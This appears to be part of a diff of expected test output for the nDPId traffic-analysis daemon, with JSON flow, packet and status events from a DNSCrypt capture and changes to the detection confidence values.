02422{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":946735705349,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946735705349,"pkt":"REREREREZmZmZmZmCABFAAXcCgMgAL0Rk+sKAAABlTjkLYmcAbsGBJVVf0IBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdARjYS0yAAAQAAEAAAAAAAAAAAAFwgAMBb4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946735705349,"flow_last_seen":946735705349,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946735705349,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":35228,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946735705349,"flow_last_seen":946735705349,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946735705349,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":35228,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00223{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":8,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946735705349} 
00418{"packet_event_id":1,"packet_event_name":"packet","packet_id":8,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946735705349,"pkt":"REREREREZmZmZmZmCABFAABQCgMAub0RuL4KAAABlTjkLQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946735705349,"flow_last_seen":946735705349,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946735705349,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":60301,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01139{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":946735705349,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946735705349,"pkt":"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"} 
-00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946735705349,"flow_last_seen":946735705349,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946735705349,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":60301,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946735705349,"flow_last_seen":946735705349,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946735705349,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":60301,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
00707{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":946735705453,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":226,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":226,"pkt_l4_len":192,"thread_ts_msec":946735705453,"pkt":"ZmZmZmZmRERERERECABFAADUC5oAADQRQF2VOOQtCgAAAQG7lfQAwC\/rf0eBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdARjYS0yAAAQAAHADAAQAAEAAAAAAH18RE5TQwACAAAFGFEAAwsZ+sBWpvUVROInn0h1y0+FE\/VHdPKdwGWI15rFeV84ZdSkid7VtVlPn9SchFzfn3Pj66PFpyoNS6YMir6PRfcrBtc8JsfsQb\/FwAoHgENy0Ke+Bxb4NU7gNSOLvo9F9ysG119TYaFfU2GhX1SzIQ=="} 00706{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":946735705457,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":226,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":226,"pkt_l4_len":192,"thread_ts_msec":946735705457,"pkt":"ZmZmZmZmRERERERECABFAADUC5sAADQRQFyVOOQtCgAAAQG7640AwNpVf0OBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdARjYS0yAAAQAAHADAAQAAEAAAAAAH18RE5TQwACAAAFGFEAAwsZ+sBWpvUVROInn0h1y0+FE\/VHdPKdwGWI15rFeV84ZdSkid7VtVlPn9SchFzfn3Pj66PFpyoNS6YMir6PRfcrBtc8JsfsQb\/FwAoHgENy0Ke+Bxb4NU7gNSOLvo9F9ysG119TYaFfU2GhX1SzIQ=="} 
00706{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":946735705457,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":226,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":226,"pkt_l4_len":192,"thread_ts_msec":946735705457,"pkt":"ZmZmZmZmRERERERECABFAADUC5wAADQRQFuVOOQtCgAAAQG7spoAwBNIf0SBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdARjYS0yAAAQAAHADAAQAAEAAAAAAH18RE5TQwACAAAFGFEAAwsZ+sBWpvUVROInn0h1y0+FE\/VHdPKdwGWI15rFeV84ZdSkid7VtVlPn9SchFzfn3Pj66PFpyoNS6YMir6PRfcrBtc8JsfsQb\/FwAoHgENy0Ke+Bxb4NU7gNSOLvo9F9ysG119TYaFfU2GhX1SzIQ=="} 
@@ -33,52 +33,52 @@ 00576{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":16,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","packets-captured":16,"packets-processed":12,"total-skipped-flows":0,"total-l4-payload-len":7056,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":6,"total-detection-updates":0,"total-updates":0,"current-active-flows":6,"total-active-flows":6,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":33,"global_ts_msec":946739299327} 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739299327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":51004,"dst_port":1053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01140{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":946739299327,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739299327,"pkt":"REREREREZmZmZmZmCABFAAIcFypAAL0R8NAKAAABPtK0R8c8BB0CCLXvBycBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANuczIIaXJpc2VkZW4CZnIAABAAAQAAAAAAAAAAAAHEAAwBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739299327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":51004,"dst_port":1053,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739299327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":51004,"dst_port":1053,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739299327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":52636,"dst_port":1053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01140{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":946739299327,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739299327,"pkt":"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"} 
-00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739299327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":52636,"dst_port":1053,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739299327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":52636,"dst_port":1053,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739299327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":49518,"dst_port":1053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01140{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":946739299327,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739299327,"pkt":"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"} -00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739299327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":49518,"dst_port":1053,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739299327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":49518,"dst_port":1053,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
00605{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739299327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":43748,"dst_port":1053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02424{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":946739299327,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739299327,"pkt":"REREREREZmZmZmZmCABFAAXcFy0gAL0RDQ4KAAABPtK0R6rkBB0GBCq4ByYBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANuczIIaXJpc2VkZW4CZnIAABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739299327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":43748,"dst_port":1053,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739299327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":43748,"dst_port":1053,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00224{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":20,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739299327} 00419{"packet_event_id":1,"packet_event_name":"packet","packet_id":20,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739299327,"pkt":"REREREREZmZmZmZmCABFAABQFy0Aub0RMeEKAAABPtK0RwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00605{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739299327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":57395,"dst_port":1053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
